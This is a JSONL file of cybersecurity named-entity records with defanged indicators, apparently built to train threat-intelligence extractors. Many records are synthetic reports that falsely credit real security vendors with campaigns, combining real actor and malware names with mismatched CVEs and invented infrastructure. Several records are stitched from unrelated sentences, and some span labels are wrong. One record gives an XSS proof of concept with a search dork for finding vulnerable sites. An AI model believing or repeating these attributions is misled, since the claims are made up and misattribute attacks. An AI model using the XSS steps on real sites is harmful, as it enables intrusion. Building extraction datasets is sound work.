{"text": "Vulnerability Advisory: CVE-2021-16078 is a critical command injection affecting Fortinet FortiGate. Sophos X-Ops confirmed active exploitation by UNC2452 in the wild. Exploitation delivers ShadowPad (SHA256: f619238405d45984f31a9191d9a4df2c23fcc143ad8a917174fcce17c01eab27) which is dropped to /dev/shm/helper.sh. The exploit payload is hosted at hxxp://syncgateway[.]net/assets/js/payload.js and communicates to 180 [ . ] 125 [ . ] 104 [ . ] 82 for C2.", "spans": {"Vulnerability: CVE-2021-16078": [[24, 38]], "Vulnerability: command injection": [[53, 70]], "System: Fortinet FortiGate": [[81, 99]], "Organization: Sophos X-Ops": [[101, 113]], "Malware: ShadowPad": [[190, 199]], "Indicator: f619238405d45984f31a9191d9a4df2c23fcc143ad8a917174fcce17c01eab27": [[209, 273]], "Indicator: http://syncgateway.net/assets/js/payload.js": [[348, 393]], "Indicator: 180.125.104.82": [[414, 446]]}, "info": {"id": "synth_v2_00711", "source": "defanged_augment"}}
{"text": "A backdoor also known as: TrojanPWS.Zbot.A4 Spyware.Zbot Trojan.Zbot.Win32.150744 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Zbot TROJ_MALKRYP.SM1 Trojan.Win32.Zbot.cuxeug Win32.Trojan.Spy.Pefj TrojWare.Win32.Injector.AYTP Trojan.PWS.Panda.2982 TROJ_MALKRYP.SM1 BehavesLike[.]Win32[.]PWSZbot[.]cc TrojanSpy.Zbot.ecmj TR/Spy.ZBot.rhwnxx Trojan[Spy]/Win32.Zbot Win32.Troj.Undef.kcloud Trojan:Win32/Tesch.B Trojan.Kazy.D53F00 Backdoor/Win32.Androm.R99103 BScope.Malware-Cryptor.Winlock.7414 Win32/Injector.AYPX TrojanSpy.Zbot!As9snjQ7nLU Trojan-Downloader.Win32.Carberp W32/Kryptik.WIF!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[269, 303]]}, "info": {"id": "cyner2_train_000660", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfs: Only call folio_start_fscache() one time for each folio\n\nIf a network filesystem using netfs implements a clamp_length()\nfunction, it can set subrequest lengths smaller than a page size.\n\nWhen we loop through the folios in netfs_rreq_unlock_folios() to\nset any folios to be written back, we need to make sure we only\ncall folio_start_fscache() once for each folio.\n\nOtherwise, this simple testcase:\n\n  mount -o fsc,rsize=1024,wsize=1024 127[.]0[.]0[.]1:/export /mnt/nfs\n  dd if=/dev/zero of=/mnt/nfs/file.bin bs=4096 count=1\n  1+0 records in\n  1+0 records out\n  4096 bytes (4.1 kB, 4.0 KiB) copied, 0.0126359 s, 324 kB/s\n  echo 3 > /proc/sys/vm/drop_caches\n  cat /mnt/nfs/file.bin > /dev/null\n\nwill trigger an oops similar to the following:\n\n  page dumped because: VM_BUG_ON_FOLIO(folio_test_private_2(folio))\n  ------------[ cut here ]------------\n  kernel BUG at include/linux/netfs.h:44!\n  ...\n  CPU: 5 PID: 134 Comm: kworker/u16:5 Kdump: loaded Not tainted 6.4.0-rc5\n  ...\n  RIP: 0010:netfs_rreq_unlock_folios+0x68e/0x730 [netfs]\n  ...\n  Call Trace:\n    netfs_rreq_assess+0x497/0x660 [netfs]\n    netfs_subreq_terminated+0x32b/0x610 [netfs]\n    nfs_netfs_read_completion+0x14e/0x1a0 [nfs]\n    nfs_read_completion+0x2f9/0x330 [nfs]\n    rpc_free_task+0x72/0xa0 [sunrpc]\n    rpc_async_release+0x46/0x70 [sunrpc]\n    process_one_work+0x3bd/0x710\n    worker_thread+0x89/0x610\n    kthread+0x181/0x1c0\n    ret_from_fork+0x29/0x50", "spans": {"Indicator: 127.0.0.1": [[513, 528]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-52582"}}
{"text": "Artifact Analysis for AgentTesla campaign:\nStage 1 dropper at /tmp/implant.so - SHA1: 63003d9ce6c2659944e5c4b91949d4ff1c8d819e\nStage 2 loader at C:\\Windows\\Temp\\svchost.exe - SHA256: 24e1e25faa27a77018ab33668640f88d320e1c74a66a671349d7bc0e5bf628b1\nFinal payload at C:\\Users\\admin\\Downloads\\shell.php - MD5: 0c8c269bbe812eb666b6636b23719126\nExfiltration module - SHA256: bbb29f766be1866ea88fdab89ec02d6a288fa6353ed489923a9f300b859e70c0\nAll stages communicated with 192 [ . ] 47 [ . ] 155 [ . ] 113. BloodHound signatures detected in Stage 2.", "spans": {"Malware: AgentTesla": [[22, 32]], "Indicator: 63003d9ce6c2659944e5c4b91949d4ff1c8d819e": [[86, 126]], "Indicator: 24e1e25faa27a77018ab33668640f88d320e1c74a66a671349d7bc0e5bf628b1": [[183, 247]], "Indicator: 0c8c269bbe812eb666b6636b23719126": [[307, 339]], "Indicator: bbb29f766be1866ea88fdab89ec02d6a288fa6353ed489923a9f300b859e70c0": [[370, 434]], "Indicator: 192.47.155.113": [[464, 496]]}, "info": {"id": "synth_v2_01875", "source": "defanged_augment"}}
{"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone . The C&C server ( 82[.]137[.]255[.]56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 . We will describe APT1 ’s backdoors in two categories : “ Beachhead Backdoors ” and “ Standard Backdoors. ” The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": {"Malware: Android.Oldboot": [[4, 19]], "System: android": [[118, 125]], "Malware: malware": [[558, 565]], "Malware: massively multiplayer online role - playing games": [[595, 644]], "Indicator: 82.137.255.56": [[312, 331]]}, "info": {"id": "cyberner_stix_train_007925", "source": "defanged_augment"}}
{"text": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects CBR40 before 2 [ . ] 5 [ . ] 0 [ . ] 24, EAX20 before 1 [ . ] 0 [ . ] 0 [ . ] 48, EAX80 before 1[.]0[.]1[.]64, EX7500 before 1[.]0[.]0[.]72, R6400 before 1 [ . ] 0 [ . ] 1 [ . ] 68, R6900P before 1[.]3[.]2[.]132, R7000 before 1 [ . ] 0 [ . ] 11 [ . ] 116, R7000P before 1[.]3[.]2[.]132, R7900 before 1[.]0[.]4[.]38, R7960P before 1[.]4[.]1[.]66, R8000 before 1 [ . ] 0 [ . ] 4 [ . ] 66, RAX200 before 1 [ . ] 0 [ . ] 3 [ . ] 106, RS400 before 1[.]5[.]1[.]80, XR300 before 1 [ . ] 0 [ . ] 3 [ . ] 68, MK62 before 1[.]0[.]6[.]110, MR60 before 1 [ . ] 0 [ . ] 6 [ . ] 110, R6400v2 before 1[.]0[.]4[.]106, R8000P before 1[.]4[.]1[.]66, RAX20 before 1[.]0[.]2[.]64, RAX45 before 1 [ . ] 0 [ . ] 2 [ . ] 82, RAX80 before 1[.]0[.]3[.]106, MS60 before 1[.]0[.]6[.]110, R6700v3 before 1 [ . ] 0 [ . ] 4 [ . ] 106, R7900P before 1 [ . ] 4 [ . ] 1 [ . ] 66, RAX15 before 1 [ . ] 0 [ . ] 2 [ . ] 64, RAX50 before 1 [ . ] 0 [ . ] 2 [ . ] 82, RAX75 before 1[.]0[.]3[.]106, RBR750 before 3[.]2[.]16[.]22, RBR850 before 3[.]2[.]16[.]22, RBS750 before 3 [ . ] 2 [ . ] 16 [ . ] 22, RBS850 before 3 [ . ] 2 [ . ] 16 [ . ] 22, RBK752 before 3[.]2[.]16[.]22, and RBK852 before 3[.]2[.]16[.]22.", "spans": {"Indicator: 2.5.0.24": [[116, 142]], "Indicator: 1.0.0.48": [[157, 183]], "Indicator: 1.0.1.64": [[198, 212]], "Indicator: 1.0.0.72": [[228, 242]], "Indicator: 1.0.1.68": [[257, 283]], "Indicator: 1.3.2.132": [[299, 314], [373, 388]], "Indicator: 1.0.11.116": [[329, 357]], "Indicator: 1.0.4.38": [[403, 417]], "Indicator: 1.4.1.66": [[433, 447], [719, 733], [922, 948]], "Indicator: 1.0.4.66": [[462, 488]], "Indicator: 1.0.3.106": [[504, 531], [818, 833], [1045, 1060]], "Indicator: 1.5.1.80": [[546, 560]], "Indicator: 1.0.3.68": [[575, 601]], "Indicator: 1.0.6.110": [[615, 630], [644, 671], [847, 862]], "Indicator: 1.0.4.106": [[688, 703], [879, 906]], "Indicator: 1.0.2.64": [[748, 762], [963, 989]], "Indicator: 1.0.2.82": [[777, 803], [1004, 1030]], "Indicator: 3.2.16.22": [[1076, 1091], [1107, 1122], [1138, 1165], [1181, 1208], [1224, 1239], [1259, 1274]], "Vulnerability: command injection": [[40, 57]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-45617"}}
{"text": "Sophos X-Ops published a threat intelligence report linking Scattered Spider to a new campaign exploiting CVE-2024-31252 in Ivanti Connect Secure. The attackers deployed StealC via CrackMapExec, establishing C2 communication with 34 [ . ] 189 [ . ] 54 [ . ] 82 and login-auth[.]com. A secondary payload was downloaded from hxxp://portalstatic[ . ]site/download/update.exe. The malware binary (MD5: 7cba07f381cefcf75a1fba876742d0c8) was dropped to /opt/app/bin/runtime.dll. Phishing emails were sent from security@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 172 [ . ] 62 [ . ] 136 [ . ] 116.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2024-31252": [[106, 120]], "System: Ivanti Connect Secure": [[124, 145]], "Malware: StealC": [[170, 176]], "Indicator: 34.189.54.82": [[230, 260]], "Indicator: login-auth.com": [[265, 281]], "Indicator: hxxp://portalstatic.site/download/update.exe": [[323, 371]], "Indicator: 7cba07f381cefcf75a1fba876742d0c8": [[398, 430]], "Indicator: security@credential-check.site": [[504, 536]], "Indicator: 172.62.136.116": [[602, 634]]}, "info": {"id": "synth_v2_00063", "source": "defanged_augment"}}
{"text": "Blog Post by Secureworks: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-42806 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from confirm@credential-check[ . ]site delivering RedLine Stealer. Post-compromise, the attackers deploy BlackCat and use WinPEAS for reconnaissance. C2 infrastructure includes 172[.]13[.]223[.]50 and login-login[.]io. A staging server at hxxp://static-data[.]link/secure/token hosts additional tooling. Key artifact: /dev/shm/taskhost.exe (SHA256: fe8f2afae71ef804fbf2a01faacc6981208fb45574a41c539bcc1d1e33d46d45).", "spans": {"Organization: Secureworks": [[13, 24]], "Vulnerability: CVE-2026-42806": [[124, 138]], "System: Atlassian Confluence": [[147, 167]], "Indicator: confirm@credential-check.site": [[243, 276]], "Malware: RedLine Stealer": [[288, 303]], "Malware: BlackCat": [[343, 351]], "Indicator: 172.13.223.50": [[415, 434]], "Indicator: login-login.io": [[439, 455]], "Indicator: hxxp://static-data.link/secure/token": [[477, 515]], "Indicator: fe8f2afae71ef804fbf2a01faacc6981208fb45574a41c539bcc1d1e33d46d45": [[587, 651]]}, "info": {"id": "synth_v2_01534", "source": "defanged_augment"}}
{"text": "VIPKeylogger payload (SHA256: e37ccc8bf737978f18519177a6810065e1da8a62d4e6ff627350d85e60d3c7c1) and XWorm backdoor (SHA256: ed2001b4af76a38afef7dac1caa1c26b857d4f52737368190922593cf37d9c21) were both distributed through malicious PowerShell scripts hosted on compromised WordPress sites. XWorm communicates with C2 at xworm-panel[.]ddns[.]net:7000 while VIPKeylogger sends captured keystrokes to logcollector@protonmail[.]com.", "spans": {"Malware: VIPKeylogger": [[0, 12], [354, 366]], "Malware: XWorm": [[100, 105], [288, 293]], "Indicator: e37ccc8bf737978f18519177a6810065e1da8a62d4e6ff627350d85e60d3c7c1": [[30, 94]], "Indicator: ed2001b4af76a38afef7dac1caa1c26b857d4f52737368190922593cf37d9c21": [[124, 188]], "Indicator: xworm-panel.ddns.net": [[318, 342]], "Indicator: logcollector@protonmail.com": [[396, 425]], "System: WordPress": [[271, 280]]}, "info": {"id": "otx_00009", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Dridex (SHA1: bd96cd72d2d750d97fb13b221be90c13e31a073c). Upon execution on Atlassian Confluence, the sample creates C:\\ProgramData\\beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 135 [ . ] 201 [ . ] 102 [ . ] 73 every 60 seconds and DNS queries to loginrelay[.]link. The second stage was fetched from hxxp://backup-gateway[ . ]site/callback and written to C:\\Windows\\Temp\\beacon.dll. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (SHA1: 2fe283e209de3ccdcf6523d968de9ec93940690a) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: bd96cd72d2d750d97fb13b221be90c13e31a073c": [[39, 79]], "System: Atlassian Confluence": [[100, 120]], "Indicator: 135.201.102.73": [[242, 274]], "Indicator: loginrelay.link": [[311, 328]], "Indicator: http://backup-gateway.site/callback": [[364, 403]], "Indicator: 2fe283e209de3ccdcf6523d968de9ec93940690a": [[537, 577]]}, "info": {"id": "synth_v2_00525", "source": "defanged_augment"}}
{"text": "SIF is an open source implementation of the Singularity Container Image Format. The `siftool new` command and func siftool.New() produce predictable UUID identifiers due to insecure randomness in the version of the `github[.]com/satori/go.uuid` module used as a dependency. A patch is available in version >= v1.2.3 of the module. Users are encouraged to upgrade. As a workaround, users passing CreateInfo struct should ensure the `ID` field is generated using a version of `github[ . ]com/satori/go.uuid` that is not vulnerable to this issue.", "spans": {"Indicator: github.com": [[216, 228], [475, 489]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29499"}}
{"text": "Threat Intelligence Brief (Check Point): APT28 has been observed deploying Ryuk in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from noreply@payment-confirm[ . ]top. Infrastructure includes 23 [ . ] 22 [ . ] 188 [ . ] 125, 212 [ . ] 251 [ . ] 195 [ . ] 137, and botnet-cmd[[ . ]]biz. SHA1 indicator: 02e8b81a65656c6f6f4d56959539112f29d1dc06.", "spans": {"Organization: Check Point": [[27, 38]], "Malware: Ryuk": [[75, 79]], "Indicator: noreply@payment-confirm.top": [[192, 223]], "Indicator: 23.22.188.125": [[249, 280]], "Indicator: 212.251.195.137": [[282, 315]], "Indicator: botnet-cmd[.]biz": [[321, 341]], "Indicator: 02e8b81a65656c6f6f4d56959539112f29d1dc06": [[359, 399]]}, "info": {"id": "synth_00022", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-23031 is a critical authentication bypass affecting Active Directory. Secureworks confirmed active exploitation by Ember Bear in the wild. Exploitation delivers Lumma Stealer (SHA1: 4019b0ea00c1c11c338cbd517b767cfb47f34059) which is dropped to C:\\Users\\admin\\Desktop\\beacon.dll. The exploit payload is hosted at hxxps://cdnupdate[.]link/api/v2/auth and communicates to 10 [ . ] 190 [ . ] 128 [ . ] 137 for C2.", "spans": {"Vulnerability: CVE-2021-23031": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Active Directory": [[85, 101]], "Organization: Secureworks": [[103, 114]], "Malware: Lumma Stealer": [[194, 207]], "Indicator: 4019b0ea00c1c11c338cbd517b767cfb47f34059": [[215, 255]], "Indicator: hxxps://cdnupdate.link/api/v2/auth": [[345, 381]], "Indicator: 10.190.128.137": [[402, 434]]}, "info": {"id": "synth_v2_00757", "source": "defanged_augment"}}
{"text": "CVE-2025-15356: A vulnerability has been found in Tenda AC20 up to 16[.]03[.]08[.]12. The impacted element is the function sscanf of the file /goform/PowerSaveSet. The manipulation of the argument powerSavingEn/time/powerSaveDelay/ledCloseType leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", "spans": {"Vulnerability: CVE-2025-15356": [[0, 14]], "Vulnerability: buffer overflow": [[253, 268]], "Indicator: 16.03.08.12": [[67, 84]]}, "info": {"id": "nvd_2025_15356", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0 [ . ] 9 [ . ] 8 [ . ] 923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_restart parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9734.", "spans": {"Indicator: 0.9.8.923": [[123, 150]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15611"}}
{"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp - SHA256: 29441fac67f23ef63db5cb9fca03065622c6e1abb61914ba2819fdd6e9d32c3e\nStage 2 loader at /usr/local/bin/backdoor.elf - SHA256: 173ad87fcfe5cc7fe02caf47ac495b57d3694a2d7a44c77498226b9eabb3f0d8\nFinal payload at C:\\Users\\admin\\AppData\\Local\\Temp\\runtime.dll - SHA256: 75c4f216ecbf68c7be3f08a83580150038dd55104694241ad7f67ff6b49a4dba\nExfiltration module - MD5: 02993c2548c5bafe781977e0073bda38\nAll stages communicated with 172 [ . ] 60 [ . ] 248 [ . ] 175. Sharphound signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: 29441fac67f23ef63db5cb9fca03065622c6e1abb61914ba2819fdd6e9d32c3e": [[121, 185]], "Indicator: 173ad87fcfe5cc7fe02caf47ac495b57d3694a2d7a44c77498226b9eabb3f0d8": [[242, 306]], "Indicator: 75c4f216ecbf68c7be3f08a83580150038dd55104694241ad7f67ff6b49a4dba": [[380, 444]], "Indicator: 02993c2548c5bafe781977e0073bda38": [[472, 504]], "Indicator: 172.60.248.175": [[534, 566]]}, "info": {"id": "synth_v2_01879", "source": "defanged_augment"}}
{"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal . At startup , Svchost[ . ]exe checks the services part of the registry and constructs a list of services to load . At the end of There is a call to the main function of the malware that contains all its functionality .", "spans": {"Indicator: Svchost.exe": [[310, 325]]}, "info": {"id": "cyberner_stix_train_002641", "source": "defanged_augment"}}
{"text": "Previous version The capture service class implements the chat applications interception . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China . The one outlier was written as winword[.]exe . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": {"Indicator: winword.exe": [[221, 234]], "System: C2": [[356, 358]], "Malware: malware": [[362, 369]], "Malware: HAMMERTOSS": [[380, 390]]}, "info": {"id": "cyberner_stix_train_005724", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Latrodectus campaign:\nStage 1 dropper at /home/user/.config/helper.sh - SHA256: fcfb26d520354676c22e4d3952337ba654d7c7b0d3c7e4174e449236d3b7b1c3\nStage 2 loader at /opt/app/bin/taskhost.exe - MD5: 203306efc80a92520634bfaa05803c84\nFinal payload at /dev/shm/loader.exe - MD5: 970265e9ff1654b782a45d152032e2da\nExfiltration module - SHA1: de4cdc283e24258a76c88ff929813b9ef27fb1f1\nAll stages communicated with 66 [ . ] 180 [ . ] 243 [ . ] 29. Metasploit signatures detected in Stage 2.", "spans": {"Malware: Latrodectus": [[22, 33]], "Indicator: fcfb26d520354676c22e4d3952337ba654d7c7b0d3c7e4174e449236d3b7b1c3": [[102, 166]], "Indicator: 203306efc80a92520634bfaa05803c84": [[218, 250]], "Indicator: 970265e9ff1654b782a45d152032e2da": [[295, 327]], "Indicator: de4cdc283e24258a76c88ff929813b9ef27fb1f1": [[356, 396]], "Indicator: 66.180.243.29": [[426, 457]]}, "info": {"id": "synth_v2_01917", "source": "defanged_augment"}}
{"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection . Poison Ivy is a remote access tool that is freely available for download from its official web site at www[.]poisonivy-rat[.]com . OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} . Mandiant is investigating intrusions across multiple verticals , including legal and professional services , technology , and government organizations .", "spans": {"System: Office 365 ATP": [[0, 14]], "Organization: legal and professional services , technology , and government organizations": [[457, 532]], "Indicator: www.poisonivy-rat.com": [[217, 242]]}, "info": {"id": "cyberner_stix_train_002604", "source": "defanged_augment"}}
{"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues . Winnti : 8272c1f4 2018-11-01 13:16:24 hxxps://nw[ . ]infestexe[ . ]com/version/last.php . The Platform can look for indicators across file attachments , embedded links , and more and provide inplatform risk scoring .", "spans": {"Organization: FireEye": [[218, 225], [242, 249]], "Organization: Mandiant Consulting": [[274, 293]], "Organization: iSIGHT Intelligence": [[300, 319]], "Organization: engineering": [[386, 397]], "Organization: maritime entities": [[402, 419]], "Indicator: https://nw.infestexe.com/version/last.php": [[515, 564]]}, "info": {"id": "cyberner_stix_train_005463", "source": "defanged_augment"}}
{"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from ceo@account-update[ . ]xyz contained a link to hxxps://cachesync[ . ]online/collect. This redirected to hxxp://backup-proxy[ . ]site/assets/js/payload.js on edge-backup[.]xyz. A secondary email from info@credential-check[ . ]site pointed to hxxps://apiportal[.]top/assets/js/payload.js which delivered IcedID. The final payload callback was hxxps://relayportal[.]info/panel/index.html resolving to 192[.]14[.]164[.]50 via static-gateway[.]top.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: ceo@account-update.xyz": [[84, 110]], "Indicator: https://cachesync.online/collect": [[131, 167]], "Indicator: hxxp://backup-proxy.site/assets/js/payload.js": [[188, 237]], "Indicator: edge-backup.xyz": [[241, 258]], "Indicator: info@credential-check.site": [[283, 313]], "Indicator: hxxps://apiportal.top/assets/js/payload.js": [[325, 369]], "Malware: IcedID": [[386, 392]], "Indicator: https://relayportal.info/panel/index.html": [[425, 468]], "Indicator: 192.14.164.50": [[482, 501]], "Indicator: static-gateway.top": [[506, 526]]}, "info": {"id": "synth_v2_01775", "source": "defanged_augment"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 06[ . ]2017[ . ]docx .", "spans": {"Malware: files": [[4, 9]], "Vulnerability: Microsoft Office vulnerability": [[33, 63]], "Vulnerability: CVE-2012-0158": [[66, 79]], "Indicator: 06.2017.docx": [[159, 179]]}, "info": {"id": "cyberner_stix_train_006885", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from account@auth-check[ . ]org and service@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxp://apibackup[.]cc/portal/verify which hosted a credential harvesting page on cache-cache[ . ]top. A secondary link hxxp://staticproxy[ . ]top/api/v2/auth delivered Qbot (SHA1: bbff937c6779ddc0bd9b611929153f6fe301f6f4). The malware was saved to /usr/local/bin/implant.so and established C2 with 172 [ . ] 218 [ . ] 17 [ . ] 151.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: account@auth-check.org": [[103, 129]], "Indicator: service@mail-service.info": [[134, 161]], "Indicator: http://apibackup.cc/portal/verify": [[218, 253]], "Indicator: cache-cache.top": [[299, 318]], "Indicator: hxxp://staticproxy.top/api/v2/auth": [[337, 375]], "Malware: Qbot": [[386, 390]], "Indicator: bbff937c6779ddc0bd9b611929153f6fe301f6f4": [[398, 438]], "Indicator: 172.218.17.151": [[516, 548]]}, "info": {"id": "synth_v2_01006", "source": "defanged_augment"}}
{"text": "The package github[.]com/pires/go-proxyproto before 0.5.0 are vulnerable to Denial of Service (DoS) via the parseVersion1() function. The reader in this package is a default bufio.Reader wrapping a net.Conn. It will read from the connection until it finds a newline. Since no limits are implemented in the code, a deliberately malformed V1 header could be used to exhaust memory in a server process using this code - and create a DoS. This can be exploited by sending a stream starting with PROXY and continuing to send data (which does not contain a newline) until the target stops acknowledging. The risk here is small, because only trusted sources should be allowed to send proxy protocol headers.", "spans": {"Indicator: github.com": [[12, 24]], "Vulnerability: Denial of Service": [[76, 93]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-23351"}}
{"text": "XSS in /dashboard/blocks/stacks/view_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are outputted can be exploited for Concrete 8.5.7 and below as well as Concrete 9.0 through 9.0.2 to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 3.1with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Credit to Bogdan Tiron from FORTBRIDGE (hxxps://www[ . ]fortbridge[ . ]co[ . ]uk/ ) for reporting", "spans": {"Indicator: https://www.fortbridge.co.uk/": [[603, 644]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-30120"}}
{"text": "id=eu.chainfire.supersu ) tool 246[ . ]us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications . APT33 : 91[.]235[.]142[.]124 mywinnetwork[ . ]ddns[ . ]net . If you can understand why a hacker hacks their motivations a little more clearly , along with who is most likely to be targeting your specific organization , you can bolster your defenses and be ready for whatever the threat landscape throws your way .", "spans": {"System: Android": [[248, 255]], "Organization: ASUS": [[388, 392]], "Organization: communications": [[665, 679]], "Indicator: 91.235.142.124": [[690, 710]], "Indicator: mywinnetwork.ddns.net": [[711, 740]], "Indicator: 246.us": [[31, 41]]}, "info": {"id": "cyberner_stix_train_001796", "source": "defanged_augment"}}
{"text": "IOCs C & C IP addresses : 155[.]133[.]82[.]181 155[.]133[.]82[.]240 155[.]133[.]82[.]244 185 [ . ] 234 [ . ] 218 [ . ] 59 195[.]22[.]126[.]160 195[.]22[.]126[.]163 195[.]22[.]126[.]80 195[.]22[.]126[.]81 5[.]45[.]73[.]24 5[.]45[.]74[.]130 IP addresses from which the Trojan was downloaded : 185 [ . ] 174 [ . ] 173 [ . ] 31 185[.]234[.]218[.]59 188 [ . ] 166 [ . ] 156 [ . ] 110 195[.]22[.]126[.]160 195[.]22[.]126[.]80 195 [ . ] 22 [ . ] 126 [ . ] 81 In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"Organization: international industry organization": [[546, 581]], "Organization: aerospace": [[596, 605]], "Organization: academic": [[608, 616]], "Organization: media": [[619, 624]], "Organization: technology": [[627, 637]], "Organization: government": [[640, 650]], "Organization: utilities organizations": [[657, 680]], "Organization: Talos": [[939, 944]], "Indicator: 155.133.82.181": [[26, 46]], "Indicator: 155.133.82.240": [[47, 67]], "Indicator: 155.133.82.244": [[68, 88]], "Indicator: 185.234.218.59": [[89, 121], [324, 344]], "Indicator: 195.22.126.160": [[122, 142], [379, 399]], "Indicator: 195.22.126.163": [[143, 163]], "Indicator: 195.22.126.80": [[164, 183], [400, 419]], "Indicator: 195.22.126.81": [[184, 203], [420, 451]], "Indicator: 5.45.73.24": [[204, 220]], "Indicator: 5.45.74.130": [[221, 238]], "Indicator: 185.174.173.31": [[291, 323]], "Indicator: 188.166.156.110": [[345, 378]]}, "info": {"id": "cyberner_stix_train_005771", "source": "defanged_augment"}}
{"text": "Thinkific Thinkific Online Course Creation Platform 1.0 is affected by: Cross Site Scripting (XSS). The impact is: execute arbitrary code (remote). The component is: Affected Source code of the website CMS which is been used by many to host their online courses using the Thinkific Platform. The attack vector is: To exploit the vulnerability any user has to just visit the link - hxxps://hacktify[ . ]thinkific[ . ]com/account/billing?success=%E2%80%AA%3Cscript%3Ealert(1)%3C/script%3E. ¶¶ Thinkific is a Website based Learning Platform Product which is used by thousands of users worldwide. There is a Cross Site Scripting (XSS) based vulnerability in the code of the CMS where any attacker can execute a XSS attack. Proof of Concept & Steps to Reproduce: Step1 : Go to Google[.]com Step 2 : Search for this Dork site:thinkific[.]com -www Step 3 : You will get a list of websites which are running on the thinkific domains. Step 4 : Create account and signin in any of the website Step 5 : Add this endpoint at the end of the domain and you will see that there is a XSS Alert /account/billing?success=%E2%80%AA<script>alert(1)</script> Step 6 : Choose any domains from google for any website this exploit will work on all the websites as it is a code based flaw in the CMS Step 7 : Thousands of websites are vulnerable due to this vulnerable code in the CMS itself which is giving rise to the XSS attack.", "spans": {"Indicator: https://hacktify.thinkific.com/account/billing?success=%E2%80%AA%3Cscript%3Ealert(1": [[381, 472]], "Indicator: Google.com": [[772, 784]], "Indicator: thinkific.com": [[820, 835]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35698"}}
